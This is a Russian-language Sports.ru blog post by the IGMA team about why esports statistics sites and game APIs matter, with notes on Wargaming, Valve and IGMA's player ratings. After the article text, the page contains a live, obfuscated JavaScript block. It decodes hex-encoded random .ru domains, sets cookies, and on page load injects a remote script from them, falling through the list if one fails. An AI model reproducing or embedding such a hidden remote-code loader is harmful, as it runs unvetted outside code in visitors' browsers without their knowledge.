Для чего нужны статистические ресурсы в киберспорте?

Этот пост написан пользователем Sports.ru, начать писать может каждый болельщик (сделать это можно здесь).

Всем доброго времени суток! Мы - команда сайта хотим поделиться с вами нашими мыслями зачем вообще отображать игровую статистику и кому она нужна.

 

1. Давайте начнем с небольшой теории.Сегодня практически каждая соревновательная онлайн игра дает открытый доступ к своему API - если говорить грубо, то это место, откуда можно взять практически любые данные, ну или те, которые сами владельцы игры считают нужным отдавать общественности в свободном доступе.

Однако не все так гладко. Так как мы вообщем-то и работаем частично с API каждой игры, то можем рассказать вам, как это вообще работает: есть хорошие компании, а есть не очень. Пример хорошей компании - Wargaming, их данные - одно удовольствие. Они четко разложены по полочкам, структурированны.

Для того, чтобы вы понимали насколько это важно, приведем пример. В текстовом формате, все данные по Dota2 весят 30ТБ.

А есть нехорошие компании, например, Valve. Их API бесконечно кривой и исковерканных, а API по CS:GO в принципе не существует. Однако наши бравые разработчики смогли найти его внутри API Team Fortress 1. Возвращаемся к сути: большинство игр отдают свои данные в свободный доступ, но не всегда делают это очень качественно, и из-за этого появляется куча проблем.

2. Зачем компании - разработчики игр отдают свои данные?На самом деле тут все очень просто. Независимые команды и продукты, например мы - или любые другие, используя их данные, лишний раз акцентируем внимание на их продукте. Фактически, это бесплатный маркетинг и популяризация своего детища.

 

3. Зачем мы вообще собираем эту статистику и что-то с ней делаем.

IGMA поставила перед собой амбициозную задачу - объеденить на одном ресурсе все необходимые киберспорту статистические инструменты. Как гласит слоган cyber.sports.ru : Киберспорт - это спорт!

А значит киберспорту также нужны специальные инструменты для анализа игроков и команд, их эффективности, стратегии и так далее. Это долгая и кропотливая работа, но наличие таких инструментов показывает зрелость рынка и дисциплины.

Появление должности тренера в киберспорте - очень большой и важный шаг. Теперь дело за малым - дать таким людям, игрокам, командам необходимые инструменты. Этому и посвятила себя команда

Однако мы начали с малого: каждый челоек уже может получить свою статистику в качественной визуализации по таким дисциплинам, как Dota2, CS:GO и World of Tanks. На то, чтобы реализовать такую возможность, у нас ушло чуть меньше чем 6 месяцев. Теперь мы работаем над улучшением статистических данных и созданием уникальных аналитических сервисов внутри каждой дисциплины.

Например, буквально две недели назад, мы создали рейтинги, которые показывают эффективность каждого игрока, который зарегистрирован на . Это не просто обычный MMR, это рейтинг, который рассчитывается только на основе статистики человека и его показателей. А также мы сделали отдельный рейтинг для каждой роли и каждого героя.

Пример общего IGMA рейтинга

 

4. Мы не одни!

IGMA не единственный ресурс, который собирает и отображает статистику. И мы этому очень рады. Чем больше существует таких компаний, тем быстрее будет прогрессировать эта отрасль.Мы очень надеемся, что в ближайшем будущем киберспорт начнет применять новые методы, на основе которых будет строиться стратегия команд, решение о принятии в команду нового игрока и т.д.

С такими возможностями зрители, игроки и команды только выиграют, так как будет повышаться качество работы индустрии.

// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21144",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "cyber.sports.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

Этот пост опубликован в блоге на Трибуне Sports.ru. Присоединяйтесь к крупнейшему сообществу спортивных болельщиков!
Другие посты блога
IGMA - статистика для геймеров
+1
Комментарии
Возможно, ваш комментарий носит оскорбительный характер. Будьте вежливы к собеседнику и соблюдайте правила
Пишите корректно и дружелюбно. Принципы нашей модерации
Укажите причину бана
  • Оскорбление
  • Мат
  • Спам
  • Расизм
  • Провокации
  • Угрозы
  • Систематический оффтоп
  • Мульти-аккаунтинг
  • Прочее
Пожаловаться
  • Спам
  • Оскорбления
  • Расизм
  • Мат
  • Угрозы
  • Прочее
  • Мультиаккаунтинг
  • Систематический оффтоп
  • Провокации
Комментарий отправлен, но без доната
При попытке оплаты произошла ошибка
  • Повторить попытку оплаты
  • Оставить комментарий без доната
  • Изменить комментарий
  • Удалить комментарий

Новости